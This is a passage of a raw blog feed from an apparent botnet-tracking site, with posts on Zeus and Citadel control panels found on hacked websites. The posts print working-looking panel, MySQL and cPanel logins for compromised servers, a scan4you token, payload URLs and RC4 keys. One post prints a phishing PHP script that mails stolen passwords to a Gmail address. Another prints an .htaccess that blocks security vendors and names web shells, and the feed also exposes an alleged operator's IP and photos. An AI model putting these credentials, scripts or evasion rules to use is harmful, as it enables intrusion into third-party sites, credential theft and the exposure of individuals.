RC4 Keystream 6f1b3f922edbe51d84fcc3de7855eb08edadd2d7c40eb736692177e65665755d038370c524934a59d44015cf0f3ce01e018dfa205ec25a484dd686a5007ec773ffc1f53476633031bb689fa3f494bedd1af7bf58673e85466cd0d852727cf3ba4764d3a9f68a0a3910b4c87dca96ec828195bd16a8c950b843e96aac54b19e1c97d1b6a19aab66e3f8285c3a985f8e449c611114fefb0d6bdf38a032e4334f42095b4be8ef0253902d23a625b5f00641b9fd05121991bc89c07f8062139b2226b2d5881fc68ccd7bcee7e237ee57cb186d7a456e9d3bf22a5187da79aa294cb30c8b60ccf10ba435f92c172b4e71d9dcea74040749b0afaee18f2f27a799a23d
hxxp://54.201.153.149/ontrack-list/controller/theboldandthebeaded.php
hxxp://54.201.153.149/ontrack-list/controller/hamilton.bin
</code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com2tag:blogger.com,1999:blog-2580748854525661454.post-56815509898199702952014-11-08T16:50:00.000-08:002014-11-08T16:50:46.312-08:00Zeus - berizka.gorodok.km.ua - Botnet<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinvDRWZ6iWlJqfP4d1VVsLnUVWvUIl-RzU1XLJUFh75SA-qlOw980Q5-q0-lpAX4FFX9kacZpC9YfxLIn79gzL44oF7IKQICGsj7AmPYlCnzZO4gtGX7e-QtD9heGULzYixblMSnD8gb0/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinvDRWZ6iWlJqfP4d1VVsLnUVWvUIl-RzU1XLJUFh75SA-qlOw980Q5-q0-lpAX4FFX9kacZpC9YfxLIn79gzL44oF7IKQICGsj7AmPYlCnzZO4gtGX7e-QtD9heGULzYixblMSnD8gb0/s1600/1.png" height="232" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTBgA5hGrqfNlILuHQ_5OkB8lABUVeGApNjoeg2Bg7SnRr3qHvX2w0SSvu0e1W-8YEFT2E5SAzlb7747YOlrtZtRY3puLnzQgHScgvwq7NkZcYCpMkrrWbgf6DSv8T6KLPggGaH5DdjVg/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTBgA5hGrqfNlILuHQ_5OkB8lABUVeGApNjoeg2Bg7SnRr3qHvX2w0SSvu0e1W-8YEFT2E5SAzlb7747YOlrtZtRY3puLnzQgHScgvwq7NkZcYCpMkrrWbgf6DSv8T6KLPggGaH5DdjVg/s1600/2.png" height="232" width="320" /></a></div>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// mysql config from bot
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'berizka_image';
$config['mysql_pass'] = 'olaoluwa!@#';
$config['mysql_db'] = 'berizka_image';
// zeus panel
hxxp://berizka.gorodok.km.ua/core/auth/image/cp.php
admin:dragob
</code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com1tag:blogger.com,1999:blog-2580748854525661454.post-91182610452360034822014-11-06T14:28:00.000-08:002014-11-06T14:28:01.699-08:00Zeus Citadel - 65.200.132.20 - Botnet<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCoUUduW4qxEpXQyZpXUPPKiZwPP8cZfrAGHP02TKIjSq2SeUj_aM1EfLTg4FpqDYgXwlE19Ai6u8XtVT5qUtVCCAsxPm1rtd-ro6qtttlfq0D_f6GNvS_1O1A2Di5ME6aBdi-YKqQOC4/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCoUUduW4qxEpXQyZpXUPPKiZwPP8cZfrAGHP02TKIjSq2SeUj_aM1EfLTg4FpqDYgXwlE19Ai6u8XtVT5qUtVCCAsxPm1rtd-ro6qtttlfq0D_f6GNvS_1O1A2Di5ME6aBdi-YKqQOC4/s320/1.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjasLminA1I5SC6zaIFGOLUFsMkvNotJxmjLl0broYkBaSN4pyTY9fzh4Ke6MoWnAw6ruI4StLFv3XCs-eJXicgMYxvGis6UtmHEeJ2l_oDG0rKoNeYgOqZiD4Nsahli39vlGpRGHJAhlg/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjasLminA1I5SC6zaIFGOLUFsMkvNotJxmjLl0broYkBaSN4pyTY9fzh4Ke6MoWnAw6ruI4StLFv3XCs-eJXicgMYxvGis6UtmHEeJ2l_oDG0rKoNeYgOqZiD4Nsahli39vlGpRGHJAhlg/s320/2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3TnQhFojRJPuadNH-TuKn1r1hpebla5oiAOrCkOKbdgPoYN18yEhyGYF54N_Ra2uhtVg03tL7B-vY-HE8_0AowR7ORPASN6I615LYlWxW-r37o59GZOXd1xmDxqZTh6vLkkCEBweFffY/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3TnQhFojRJPuadNH-TuKn1r1hpebla5oiAOrCkOKbdgPoYN18yEhyGYF54N_Ra2uhtVg03tL7B-vY-HE8_0AowR7ORPASN6I615LYlWxW-r37o59GZOXd1xmDxqZTh6vLkkCEBweFffY/s320/4.png" /></a><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">the admin </span>....<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLf6Nigt9NWXLY_1w7kqb7AQ6djiCD17lClV8uE7Qx4ts5RUTeCySVCA8DsjZjI0s-TSCgbWIImjj3GGkT6b3oxBTedNZTGHQ-SYLqBfO-UDmZxh9blmAutJ8Gsk0CJ5TCbpEGOWNHk3k/s1600/8.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLf6Nigt9NWXLY_1w7kqb7AQ6djiCD17lClV8uE7Qx4ts5RUTeCySVCA8DsjZjI0s-TSCgbWIImjj3GGkT6b3oxBTedNZTGHQ-SYLqBfO-UDmZxh9blmAutJ8Gsk0CJ5TCbpEGOWNHk3k/s320/8.png" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// panel
http://65.200.132.20/webalizer/webdav/cp.php
admin:govno
// email used for phishing
kotak4amal@gmail.com
// scan4you account and jabber
'scan4you_jid' => 'uznik15@jabber.ru',
'scan4you_id' => '29719',
'scan4you_token' => 'd47310b2beea51ec546e',
// m.php
<?include 'images/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "-------- XxX *~* Mr-Lordz *~* XxX-------\n";
$message .= "User-ID: ".$_POST['user']."\n";
$message .= "Password: ".$_POST['passwd']."\n";
$message .= "IP: ".$ip."\n";
$message .= "-------------Created By Mr-lordz--------------\n";
$recipient = "kotak4amal@gmail.com";
$subject = "ComCastID ~ $ip";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: billing.htm");
}
else
{
echo "ERROR! Please go back and try again.";
}
?> </code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com1tag:blogger.com,1999:blog-2580748854525661454.post-27561733075781729322014-11-06T11:37:00.001-08:002014-11-06T11:37:32.550-08:00Zeus - sip1distribution.com - Botnet<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiai17wBJ4zEU_X4CE-xeecEIWK9lYACkloCwH0aISXUlMTYXg_3Yr-dJpiF57A2hSQBgVtfxr6HHR7EhmR4qgrlfJtu7EFimmcZ1wNMZAuANt__1w25sh7O7xNwGYHsBu6gKIP3Xa5rrc/s1600/0.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiai17wBJ4zEU_X4CE-xeecEIWK9lYACkloCwH0aISXUlMTYXg_3Yr-dJpiF57A2hSQBgVtfxr6HHR7EhmR4qgrlfJtu7EFimmcZ1wNMZAuANt__1w25sh7O7xNwGYHsBu6gKIP3Xa5rrc/s320/0.png" /></a><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZWcbwoPnsrD1BYXsRCQr5DiEpaaBuLsctxoWQubSIGK78DfixGaxlumKNtItcruWz2mCkM2x0Tw9lrlCTTqvg0UGIqpy3SXmhj3-2Hu-ggG18LxrSnw4qgp3ncanxJj5zD2P3i-94ldQ/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZWcbwoPnsrD1BYXsRCQr5DiEpaaBuLsctxoWQubSIGK78DfixGaxlumKNtItcruWz2mCkM2x0Tw9lrlCTTqvg0UGIqpy3SXmhj3-2Hu-ggG18LxrSnw4qgp3ncanxJj5zD2P3i-94ldQ/s320/1.png" /></a><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: small;">Some photos of the admin .. </span></span><br />
<br />
<a href="http://img017.wlog.com/usrimg/usrimg017/6/14/_8813058_12281406_1382686442.jpg" imageanchor="1"><img border="0" src="http://img017.wlog.com/usrimg/usrimg017/6/14/_8813058_12281406_1382686442.jpg" height="320" width="240" /></a><br />
<br />
<a href="http://ce484cb8e792306e275c-79e83dd3f64264481d2bc6deba896802.r30.cf2.rackcdn.com/6374598_0_4a280092369f2497f0991396c298d4a5.jpg" imageanchor="1"><img border="0" src="http://ce484cb8e792306e275c-79e83dd3f64264481d2bc6deba896802.r30.cf2.rackcdn.com/6374598_0_4a280092369f2497f0991396c298d4a5.jpg" height="320" width="320" /></a>
<br />
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// admin ip
hxxp://www.utrace.de/?query=<span style="background-color: yellow;">41.79.219.204</span>
// zeus panel
admin:thankgod123
hxxp://sip1distribution.com/.zerd/cp.php
// mysql
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'sip1dist_admin';
$config['mysql_pass'] = 'thankgod123';
$config['mysql_db'] = 'sip1dist_admin';
</code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-18495665313299294312014-11-05T10:16:00.000-08:002014-11-05T11:49:40.522-08:00Zbot - kihsmalta.com - Hacked<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRN8WTfFFIe7WtrPN4IfnwQOBF-YQ8ZCuv7jCPEBv58chEwtek0ZrOEGiZw2RwC1FM8hRwLmlYXdiIdpTuqp0Rb6kDUpQgXDu-2_81nqgFTedAeKpEEXKcGJNo-16DEfplisqNkcTVr8s/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRN8WTfFFIe7WtrPN4IfnwQOBF-YQ8ZCuv7jCPEBv58chEwtek0ZrOEGiZw2RwC1FM8hRwLmlYXdiIdpTuqp0Rb6kDUpQgXDu-2_81nqgFTedAeKpEEXKcGJNo-16DEfplisqNkcTVr8s/s320/1.png" /></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipaUwHR2DapE5_mEgyr2EvJ3UUxbrTBs0S6V21IDLs1dGpIa1QcafAtvXnBJGm4I7LbAF_AbJAL7HRXATtRn-7nd258kacb_Wvs0G62mqBy9ZsqtY2QckjWQd0C-Zdwk8-BJq4tzeEBZg/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipaUwHR2DapE5_mEgyr2EvJ3UUxbrTBs0S6V21IDLs1dGpIa1QcafAtvXnBJGm4I7LbAF_AbJAL7HRXATtRn-7nd258kacb_Wvs0G62mqBy9ZsqtY2QckjWQd0C-Zdwk8-BJq4tzeEBZg/s320/2.png" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZuh_ezkW2z0VcI5hE1MXMpCg8XkHSFtCD-UkboVyjQZ0l0EG-s44HlNGwRH2Z86sv9RIkzK_fwvfAaTuAtXuB3XlY4zuoT5f7v3SC11I3x5K71k0FWKXJ_kKIbwXTImaa9KqqQaKakA/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZuh_ezkW2z0VcI5hE1MXMpCg8XkHSFtCD-UkboVyjQZ0l0EG-s44HlNGwRH2Z86sv9RIkzK_fwvfAaTuAtXuB3XlY4zuoT5f7v3SC11I3x5K71k0FWKXJ_kKIbwXTImaa9KqqQaKakA/s320/3.png" /></a>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// http://urlquery.net/report.php?id=1415211438936
// zeus panel
hxxp://kihsmalta.com/cp.php
// .htacces file
deny from quttera.com
deny from hosts-file.net
deny from amada.abuse.ch
deny from palevotracker.abuse.ch
deny from blogger.com
deny from phishtank.com
deny from netcraft.com
deny from google.com
deny from yahoo.com
deny from malwared.ru
deny from malware.com.br
deny from malekal.com
deny from k7computing.com
deny from gdata.com
deny from gdatasoftware.com
deny from fortinet.com
deny from emsisoft.com
deny from quttera.com
deny from opera.com
deny from infospyware.com
deny from .................... etc
<files cron.php="">
allow from all
</files>
<files botnet_socks.php=""> allow from all
</files>
# Block shell uploaders, htshells, and other baddies
RewriteCond %{REQUEST_URI} ((php|my|bypass)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|c100|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_URI} (\.exe|\.php\?act=|\.tar|_vti|afilter=|algeria\.php|chbd|chmod|cmd|command|db_query|download_file|echo|edit_file|eval|evil_root|exploit|find_text|fopen|fsbuff|fwrite|friends_links\.|ftp|gofile|grab|grep|htshell|\ -dump|logname|lynx|mail_file|md5|mkdir|mkfile|mkmode|MSOffice|muieblackcat|mysql|owssvr\.dll|passthru|popen|proc_open|processes|pwd|rmdir|root|safe0ver|search_text|selfremove|setup\.php|shell|ShellAdresi\.TXT|spicon|sql|ssh|system|telnet|trojan|typo3|uname|unzip|w00tw00t|whoami|xampp) [NC,OR]
RewriteCond %{QUERY_STRING} (\.exe|\.tar|act=|afilter=|alter|benchmark|chbd|chmod|cmd|command|cast|char|concat|convert|create|db_query|declare|delete|download_file|drop|edit_file|encode|environ|eval|exec|exploit|find_text|fsbuff|ftp|friends_links\.|globals|gofile|grab|insert|localhost|logname|loopback|mail_file|md5|meta|mkdir|mkfile|mkmode|mosconfig|muieblackcat|mysql|order|passthru|popen|proc_open|processes|pwd|request|rmdir|root|scanner|script|search_text|select|selfremove|set|shell|sql|sp_executesql|spicon|ssh|system|telnet|trojan|truncate|uname|union|unzip|whoami) [NC]
RewriteRule .* - [F]
/// extracted from xylitol</code><code style="color: black; word-wrap: normal;">Malware family ZEUS
MD5 8f6b9dbfb715c4a8166401e6fc511964
Version 2.1.0.1
RC4 Keystream 21db88b013ff66617997a990f083df91ac7327b64287569a376a5a63ee4abf234da43d2e758644c919788bc09200957d7b04084fa6dc1503e753f50257f10b121caea254c5be6d55fbaa07d21b777e2a67100ff27c6072d343ca9dbc80eb2f2ccd5293711ae6d9c365b5f8f3ddd83550189c3a418a8c9406b96bce25cb38d4d0695f8999e8d7fa0c013c2833e5a5cfcc5e14c61e816ca04bb2c1bac776170adaf451322d40e9e2ef3ea3bb11456fe1d5294e0eea1dfc85b38df9d659393174263447b4ec5b84f70d58deb85ca798c848c28e05f67ae39bed9f647062e47f682b209609c4fe6eb11f4caf8f22d1a182a8abb73f3b1624fd36465dbdad309ee049
</code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-28250349913840853372014-11-04T14:46:00.000-08:002014-11-04T14:46:36.125-08:00Zbot - motoecarro.com.br - Hacked<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd-tKB2wTe7095tHgMb-RGEU3MbMyBucH_LbRfZ7S2eQJu5AkMzbuBVT04EnZh1tGNUCLPkqvufPoGQ0vRHDy5SDRocIcp-BHVIFKHL0jZLH013VAXTmTeBYh58ayMyWaALf7N9ucsCEo/s1600/1.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd-tKB2wTe7095tHgMb-RGEU3MbMyBucH_LbRfZ7S2eQJu5AkMzbuBVT04EnZh1tGNUCLPkqvufPoGQ0vRHDy5SDRocIcp-BHVIFKHL0jZLH013VAXTmTeBYh58ayMyWaALf7N9ucsCEo/s320/1.png" /></a><br><br><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q3hSYEh0SZA5qTJFmD3sCIKlcgp-mllM3VqrfSVZue76XDMSfFScUk7oDXx91-kgdmW_tNkEaRx3iFJFHwqzzPmZngQ6Bh3U5bbIBaTssT63nSQ0LtYlSjGXKCirBVPlcUIsH9A6YSw/s1600/2.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q3hSYEh0SZA5qTJFmD3sCIKlcgp-mllM3VqrfSVZue76XDMSfFScUk7oDXx91-kgdmW_tNkEaRx3iFJFHwqzzPmZngQ6Bh3U5bbIBaTssT63nSQ0LtYlSjGXKCirBVPlcUIsH9A6YSw/s320/2.png" /></a><br><pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// mysql
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'motoecar_1';
$config['mysql_pass'] = 'J31OIPuOLSf$';
$config['mysql_db'] = 'motoecar_1';
// zeus panel
hxxp://motoecarro.com.br/images/cp.php
user : admin
pass : 123456
// config.bin
hxxp://motoecarro.com.br/images/config.bin</code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-25342944658965720162014-11-04T13:52:00.000-08:002014-11-04T13:52:15.533-08:00Zbot - menumaterno.com.br - Hacked<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBgi6ClG3229_wzMYQqfNJKnVACBTzm-blOWxBdt7Y0K0lMVX9-DY-rv9jlgNXhE2qnpMp-i9N4CG8J9mnSr8irWw7E58Yz7yZ5sxdYN9k9xzvFH7J7W-6uAxJXmYwgqDI-suOoIQ6vkI/s1600/02.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBgi6ClG3229_wzMYQqfNJKnVACBTzm-blOWxBdt7Y0K0lMVX9-DY-rv9jlgNXhE2qnpMp-i9N4CG8J9mnSr8irWw7E58Yz7yZ5sxdYN9k9xzvFH7J7W-6uAxJXmYwgqDI-suOoIQ6vkI/s320/02.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9iedC4j6hmaJr5wCceBkz4wkEPhg-usZX2Wgf-2RYFoy3eCSWI3rKI9FsmPcy5h8I3VyyqwiXEur4HXXgN1qqR3Pbb8UYy8O6uzQIOLDgP7KNV-VJa1jnUfeos5wqpjifN5VIPhnIu1Y/s1600/01.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9iedC4j6hmaJr5wCceBkz4wkEPhg-usZX2Wgf-2RYFoy3eCSWI3rKI9FsmPcy5h8I3VyyqwiXEur4HXXgN1qqR3Pbb8UYy8O6uzQIOLDgP7KNV-VJa1jnUfeos5wqpjifN5VIPhnIu1Y/s320/01.png" /></a>
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'materno_labe';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'materno_labe';
// hxxp://menumaterno.com.br/skins/tango/thumb.php [shell]
// zeus panel
hxxp://menumaterno.com.br/skins/tango/_labe/cp.php?m=home
user : admin
pass : 1qaz2wsx
[cpan]
password=provnet13
user=materno
</code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com1tag:blogger.com,1999:blog-2580748854525661454.post-69833498462716940682014-11-04T06:43:00.000-08:002014-11-04T06:43:04.384-08:00Zbot - e-rbi.org - Hacked<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoB5nb-h1YcftoqgwZnR5yGBWfDa9nvRo6uY_N43vIM6TZkQeJXISPF_YS3YUHi6VtXk0CfRHa6TE1T9HzEDcldTstwhaYwpY0ZWDrh6oF7ujADVHWZ9nI5yPLsebOd2jwPfGxpyIwyXg/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoB5nb-h1YcftoqgwZnR5yGBWfDa9nvRo6uY_N43vIM6TZkQeJXISPF_YS3YUHi6VtXk0CfRHa6TE1T9HzEDcldTstwhaYwpY0ZWDrh6oF7ujADVHWZ9nI5yPLsebOd2jwPfGxpyIwyXg/s320/1.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rZ6oWrLlECajIpeG44mv1eX-UFy-cDGczclk29d81XOV0EN25XB4Lltc6NPBJQryIY8PVvsp5nIOExEoFRBmpIuP7B4cGYETas5Y9Phi3wYq51YU7_XtO3ADl_ZaS-gO_1cEGniwQVg/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rZ6oWrLlECajIpeG44mv1eX-UFy-cDGczclk29d81XOV0EN25XB4Lltc6NPBJQryIY8PVvsp5nIOExEoFRBmpIuP7B4cGYETas5Y9Phi3wYq51YU7_XtO3ADl_ZaS-gO_1cEGniwQVg/s320/2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Gr289PCQUmu-zlt8LcGkzc-7bw_amgSbu72L7jDPe9mdZAmkmT-R6YuoCPg4eu0ULVJGk1VsK4087E609R8zthWRkuqy16f4Sfq4_GJiS3jsq1ij38FqVa13FCU38jTNK5oHTcVy42M/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Gr289PCQUmu-zlt8LcGkzc-7bw_amgSbu72L7jDPe9mdZAmkmT-R6YuoCPg4eu0ULVJGk1VsK4087E609R8zthWRkuqy16f4Sfq4_GJiS3jsq1ij38FqVa13FCU38jTNK5oHTcVy42M/s320/3.png" /></a>
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">hxxp://e-rbi.org/03/serverphp/cp.php
</code></pre>
<br />
<span style="font-size: x-small;">All info ( php shell , zeus panel ) conntact me at my email !!</span>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0